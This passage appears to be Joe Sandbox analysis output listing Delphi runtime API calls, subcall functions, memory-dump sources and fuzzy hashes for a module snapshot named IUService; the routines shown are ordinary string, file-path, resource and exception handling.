                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB5D
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB72
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$Array$qqrpvt1uiFinalize$Free$qqrvObject@$Free$ArrayClr$qqrpvExcept$Mem$qqrpvObject$qqrv$Clear$qqrrpvpvClr$qqrpviExchangeInterlockedSysutils@$Addr$qqrvClassClass$qqrp14Dispose$qqrpvt1Encoding@Encodings$qqrvMetaModuleNil$qqrpvObjectp17Proc$qqrpqqrui$vRemoveStringUnload
                                                                                                                                            • String ID: ,lP$XlP$kP
                                                                                                                                            • API String ID: 2770033941-639665064
                                                                                                                                            • Opcode ID: f23baf51e28d9a27ceff879c9aaca5bdc4a02411ffc7946e290e9f0f5d05e065
                                                                                                                                            • Instruction ID: 458439708314837829a00875a32db1e9822d01f5b0deb47506a78c5581f45b3e
                                                                                                                                            • Opcode Fuzzy Hash: f23baf51e28d9a27ceff879c9aaca5bdc4a02411ffc7946e290e9f0f5d05e065
                                                                                                                                            • Instruction Fuzzy Hash: 3431F0203570C147F714ABE8F82266A3221DFA1751FD08B27F1009B792CA29DD4297E2
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B29
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B38
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B3D
                                                                                                                                            • @Variants@VarInvalidOp$qqrv.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B47
                                                                                                                                            • @Sysutils@SysErrorMessage$qqrui.RTL120(?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030C6F
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000002,?,?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030C8C
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000002,?,?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030C9B
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000002,?,?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030CA0
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSysutils@$Except$qqrvException@$bctr$qqrx20LoadRaiseString$qqrp20System@@Unicode$ErrorInvalidMessage$qqruiOp$qqrvRecxiStringpx14Variants@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 770543886-0
                                                                                                                                            • Opcode ID: a1282365be09462d89120203df3854cda1f43aef0eed8fd7da0b363bcbf0933f
                                                                                                                                            • Instruction ID: f96400911d13d964e0fb64cf20edc1743dca0574da95ff12fd542a95d4d1681a
                                                                                                                                            • Opcode Fuzzy Hash: a1282365be09462d89120203df3854cda1f43aef0eed8fd7da0b363bcbf0933f
                                                                                                                                            • Instruction Fuzzy Hash: B15183345035C9CFEF21DBE4EDA29EEB3B1AF24204F504326F90097666CB75AD059BA1
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 50029E40: FindResourceW.KERNEL32(?,PACKAGEINFO,0000000A), ref: 50029E56
                                                                                                                                              • Part of subcall function 50029E40: LoadResource.KERNEL32(?,00000000,?,PACKAGEINFO,0000000A), ref: 50029E61
                                                                                                                                              • Part of subcall function 50029E40: LockResource.KERNEL32(00000000,00000000,50029EA0,?,?,00000000,?,PACKAGEINFO,0000000A), ref: 50029E81
                                                                                                                                              • Part of subcall function 50029E40: FreeResource.KERNEL32(00000000,50029EA7,?,?,00000000,?,PACKAGEINFO,0000000A), ref: 50029E9A
                                                                                                                                            • @Sysutils@GetModuleName$qqrui.RTL120(00000000,5002A3C8), ref: 5002A0CB
                                                                                                                                            • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5002A3C8), ref: 5002A0D6
                                                                                                                                            • @Sysutils@ChangeFileExt$qqrx20System@UnicodeStringt1.RTL120(00000000,5002A3C8), ref: 5002A0E3
                                                                                                                                            • @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5002A3C8), ref: 5002A0F3
                                                                                                                                            • @System@UTF8ToString$qqrpxcxi.RTL120(00000000,00000000,5002A3C8), ref: 5002A121
                                                                                                                                            • @Sysutils@ChangeFileExt$qqrx20System@UnicodeStringt1.RTL120(00000000,00000000,5002A3C8), ref: 5002A131
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,5002A3C8), ref: 5002A139
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,5002A3C8), ref: 5002A13F
                                                                                                                                            • @Sysutils@StrLen$qqrpxc.RTL120(00000000,00000000,5002A3C8), ref: 5002A14D
                                                                                                                                            • @System@@New$qqripv.RTL120(00000000,5002A3C8), ref: 5002A17A
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(?,00000000,5002A3C8), ref: 5002A1B6
                                                                                                                                            • @Sysutils@HashName$qqrpc.RTL120 ref: 5002A1C6
                                                                                                                                            • @Sysutils@HashName$qqrpc.RTL120 ref: 5002A1E1
                                                                                                                                              • Part of subcall function 50029CF0: @System@@PCharLen$qqrpc.RTL120(?,?,00000000,?,5002A1CB), ref: 50029C6A
                                                                                                                                              • Part of subcall function 50029CF0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,5002A1CB), ref: 50029C7E
                                                                                                                                              • Part of subcall function 50029CF0: @System@@GetMem$qqri.RTL120(0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,5002A1CB), ref: 50029C91
                                                                                                                                              • Part of subcall function 50029CF0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 50029CA7
                                                                                                                                              • Part of subcall function 50029CF0: CharUpperBuffW.USER32(?,00000000,0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000), ref: 50029CAE
                                                                                                                                              • Part of subcall function 50029CF0: @System@@FreeMem$qqrpv.RTL120(?,00000000,0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000), ref: 50029CDD
                                                                                                                                            • @Sysutils@StrIComp$qqrpxct1.RTL120 ref: 5002A201
                                                                                                                                            • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,500A7DBC,00000000), ref: 5002A27E
                                                                                                                                            • @System@UTF8ToString$qqrpxcxi.RTL120(00000000,00000000,500A7DBC,00000000), ref: 5002A29B
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000002,?,00000000,00000000,500A7DBC,00000000), ref: 5002A2C7
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000002,?,00000000,00000000,500A7DBC,00000000), ref: 5002A2CC
                                                                                                                                            • @Sysutils@StrLen$qqrpxc.RTL120 ref: 5002A37E
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5002A3CF), ref: 5002A3BA
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Sysutils@$Unicode$String$CharResource$File$AnsiByteChangeExt$qqrx20FreeFromHashLen$qqrpxcModuleMultiName$qqrpcString$qqrpxcxiStringt1System@%Wide$ArrayBuffChar$qqrx20Clr$qqrpvComp$qqrpxct1Except$qqrvException@$bctr$qqrp20ExtractFindHandleLen$qqrpcLength$qqrvLoadLockMem$qqriMem$qqrpvName$qqruiName$qqrx20New$qqripvRaiseRecpx14RecxiStr$qqrr20Str$qqrr27StringusStringx27T$us$i0$%T$us$i0$%x20Upper
                                                                                                                                            • String ID: .bpl$SysInit
                                                                                                                                            • API String ID: 832494849-1949293470
                                                                                                                                            • Opcode ID: 80d2e90f927725b8c34378fd1ad348739718c56a093d0ac4d107abcea30af493
                                                                                                                                            • Instruction ID: 837392768b698e741bc70171f0b158cd4f4db25f9bd6245715707dd2a9ab8d4f
                                                                                                                                            • Opcode Fuzzy Hash: 80d2e90f927725b8c34378fd1ad348739718c56a093d0ac4d107abcea30af493
                                                                                                                                            • Instruction Fuzzy Hash: 88D13C74E0129A9FDB10CF98D880ADEB7F5FF59304F10866AE554AB351DB30AE45CB90
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 500246E0: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024767), ref: 50024741
                                                                                                                                              • Part of subcall function 500246E0: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024767), ref: 50024746
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50024C6D), ref: 50024968
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50024C6D), ref: 5002498C
                                                                                                                                            • @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50024C6D), ref: 50024997
                                                                                                                                            • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,50024C6D), ref: 500249B4
                                                                                                                                            • @Sysutils@CurrentYear$qqrv.RTL120(?,?,?,00000000,50024C6D), ref: 50024AC1
                                                                                                                                            • @Sysutils@CurrentYear$qqrv.RTL120(?,?,00000000,50024C6D), ref: 50024AFA
                                                                                                                                              • Part of subcall function 50022830: GetLocalTime.KERNEL32 ref: 50022834
                                                                                                                                            • @System@Pos$qqrx20System@UnicodeStringt1.RTL120(?,?,00000000,50024C6D), ref: 50024B5C
                                                                                                                                            • @Sysutils@TryEncodeDate$qqrusususr16System@TDateTime.RTL120(?,?,?,00000000,50024C6D), ref: 50024C3D
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@Sysutils@$Ansi$CurrentFromPos$qqrx20Str$qqrr20Stringt1Stringx27System@%T$us$i0$%TimeYear$qqrv$Copy$qqrx20DateDate$qqrusususr16EncodeEnsureInternalLen$qqrx20LocalString$qqrr20StringiiTrim$qqrx20
                                                                                                                                            • String ID: ddd
                                                                                                                                            • API String ID: 267030927-4224823564
                                                                                                                                            • Opcode ID: 92fb4fcf5a5ca246f8cc9000afe12874db32018b39c2798d273ab4d6d16fe3e0
                                                                                                                                            • Instruction ID: 1069cb2eb66a71ff8ce87d181cf04f1ba4992945fcbd8b3ac5469d60a7480345
                                                                                                                                            • Opcode Fuzzy Hash: 92fb4fcf5a5ca246f8cc9000afe12874db32018b39c2798d273ab4d6d16fe3e0
                                                                                                                                            • Instruction Fuzzy Hash: 52A19034E0219A8ADB40DFE9E8506FEB7F4AF19300F50426AEC44E7251D774DE85CBA6
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 5002F525
                                                                                                                                              • Part of subcall function 5002F4F0: GetProcAddress.KERNEL32(00000000), ref: 5002F509
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                                                            • Opcode ID: e06b940d9476934792f39afd65196c440aa36b4342473c26250aa0f9965bd5d2
                                                                                                                                            • Instruction ID: 68bf6f208d1ebe513e8a8dda1fcfe738442d494e70350c7787d103a1d8736fcd
                                                                                                                                            • Opcode Fuzzy Hash: e06b940d9476934792f39afd65196c440aa36b4342473c26250aa0f9965bd5d2
                                                                                                                                            • Instruction Fuzzy Hash: 37413B6558B6C74A23146BADF90343777D89AA4E94360833BF808CA282DFB87C408769
                                                                                                                                            APIs
                                                                                                                                            • @System@@InitializeRecord$qqrpvt1.RTL120 ref: 5001CA61
                                                                                                                                              • Part of subcall function 5000AE00: @System@@InitializeArray$qqrpvt1ui.RTL120 ref: 5000AE24
                                                                                                                                            • @Sysutils@ExpandFileName$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CA78
                                                                                                                                              • Part of subcall function 5001C9D8: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000104,?), ref: 5001C9F1
                                                                                                                                              • Part of subcall function 5001C9D8: GetFullPathNameW.KERNEL32(00000000,00000104,?), ref: 5001C9F7
                                                                                                                                              • Part of subcall function 5001C9D8: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000104,?), ref: 5001CA04
                                                                                                                                            • @Sysutils@ExtractFilePath$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CA82
                                                                                                                                              • Part of subcall function 5001C610: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C61E
                                                                                                                                              • Part of subcall function 5001C610: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C62F
                                                                                                                                            • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CA8C
                                                                                                                                              • Part of subcall function 5001C8E4: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C8F2
                                                                                                                                              • Part of subcall function 5001C8E4: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C904
                                                                                                                                            • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CAA3
                                                                                                                                              • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C749
                                                                                                                                              • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C774
                                                                                                                                              • Part of subcall function 5001C70C: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C79A
                                                                                                                                            • @Sysutils@IncludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CAB4
                                                                                                                                              • Part of subcall function 500286A0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286AB
                                                                                                                                              • Part of subcall function 500286A0: @Sysutils@IsPathDelimiter$qqrx20System@UnicodeStringi.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286C5
                                                                                                                                              • Part of subcall function 500286A0: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286D5
                                                                                                                                            • @Sysutils@SameFileName$qqrx20System@UnicodeStringt1.RTL120(00000000,5001CC45), ref: 5001CAC2
                                                                                                                                              • Part of subcall function 5002889C: @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288BC
                                                                                                                                              • Part of subcall function 5002889C: @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(?,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288CA
                                                                                                                                              • Part of subcall function 5002889C: @Sysutils@CompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288D3
                                                                                                                                            • @Sysutils@ExcludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CAFC
                                                                                                                                              • Part of subcall function 50028704: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5002870F
                                                                                                                                              • Part of subcall function 50028704: @Sysutils@IsPathDelimiter$qqrx20System@UnicodeStringi.RTL120(?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 50028729
                                                                                                                                              • Part of subcall function 50028704: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 50028748
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB0A
                                                                                                                                            • @Sysutils@ExpandFileNameCase$qqrx20System@UnicodeStringr27Sysutils@TFilenameCaseMatch.RTL120(00000000,5001CC45), ref: 5001CB1E
                                                                                                                                              • Part of subcall function 5001CA14: @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB2C
                                                                                                                                              • Part of subcall function 5001CA14: @Sysutils@IncludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB49
                                                                                                                                              • Part of subcall function 5001CA14: @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB57
                                                                                                                                            • @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(00000000,5001CC45), ref: 5001CAEA
                                                                                                                                              • Part of subcall function 5001C140: FindClose.KERNEL32(?,?,5001C10A,00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C14C
                                                                                                                                            • @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec.RTL120(00000000,5001CC45), ref: 5001CADD
                                                                                                                                              • Part of subcall function 5001C0CC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E1
                                                                                                                                              • Part of subcall function 5001C0CC: FindFirstFileW.KERNEL32(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E7
                                                                                                                                              • Part of subcall function 5001C0CC: @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C105
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CB76
                                                                                                                                            • @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CB8C
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CBB8
                                                                                                                                            • @System@@TryFinallyExit$qqrv.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CBBD
                                                                                                                                            • @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(5001CBE4,00000000,5001CC45), ref: 5001CBD7
                                                                                                                                            • @System@@FinalizeRecord$qqrpvt1.RTL120(5001CC4C), ref: 5001CC32
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$Sysutils@$System@@$String$Stringx20$Delimiter$qqrx20FileFind$Path$Asg$qqrr20Search$AnsiStringt1$Case$qqrx20Close$qqrr19Copy$qqrx20ExtractFromName$qqrx20StringiStringiiTrailing$Cat3$qqrr20Char$qqrx20ExpandFirst$qqrx20IncludeInitializeInternalLastLowerNameRecord$qqrpvt1Str$qqrr20Stringir19Stringt2Stringx27System@%T$us$i0$%$Array$qqrpvt1uiCaseCat$qqrr20CharCloseCompareDrive$qqrx20ExcludeExit$qqrvFilenameFinalizeFinallyFirstFullLen$qqrr20Length$qqrr20MatchPath$qqrx20SameStr$qqrx20StringpbiStringr27
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3647251182-0
                                                                                                                                            • Opcode ID: babfc3170ad390a3f6173a305eb4a18e5706085a47ed011bab55c1456b62137d
                                                                                                                                            • Instruction ID: 8f116e2beaebb0910c79983e48f6089e9e1a1bde4e140d13074eedb8cff09ffc
                                                                                                                                            • Opcode Fuzzy Hash: babfc3170ad390a3f6173a305eb4a18e5706085a47ed011bab55c1456b62137d
                                                                                                                                            • Instruction Fuzzy Hash: B9510734906199DBDB50DFA4DD96ACDB7B5EF49310F9082E6E808A3211DB30AF85CF80
                                                                                                                                            APIs
                                                                                                                                            • @System@@FillChar$qqrpvib.RTL120 ref: 50003480
                                                                                                                                            • @System@@FillChar$qqrpvib.RTL120 ref: 50003492
                                                                                                                                            • @System@SysUnregisterExpectedMemoryLeak$qqrpv.RTL120 ref: 500034FA
                                                                                                                                            • @System@SysUnregisterExpectedMemoryLeak$qqrpv.RTL120 ref: 5000354C
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 500035B3
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 50003637
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 50003694
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 500036CD
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 500036E9
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 50003705
                                                                                                                                              • Part of subcall function 50003018: @System@Move$qqrpxvpvi.RTL120(?,?,500035CA), ref: 50003022
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 5000379C
                                                                                                                                            • @System@@PCharLen$qqrpc.RTL120 ref: 50003802
                                                                                                                                            • MessageBoxA.USER32(00000000,?,50001ED0,00002010), ref: 50003829
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$CharLen$qqrpc$System@$Char$qqrpvibExpectedFillLeak$qqrpvMemoryUnregister$MessageMove$qqrpxvpvi
                                                                                                                                            • String ID: $7$<JP$jP
                                                                                                                                            • API String ID: 1068419464-4104698994
                                                                                                                                            • Opcode ID: a8bb0f9d858d0eae5a91e9caac678f446fdd161179c3f76a6e3532f1f0ec883b
                                                                                                                                            • Instruction ID: 1bd8d098dfdd9012cd56aed44c4f0c03c4dd7fa1f26bc2d498341ce450a84f99
                                                                                                                                            • Opcode Fuzzy Hash: a8bb0f9d858d0eae5a91e9caac678f446fdd161179c3f76a6e3532f1f0ec883b
                                                                                                                                            • Instruction Fuzzy Hash: 27B1E430A052D48BFB32DB6CDC90B88B7F8BB49650F9442E6E449DB352CB719D85CB91
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391FF
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
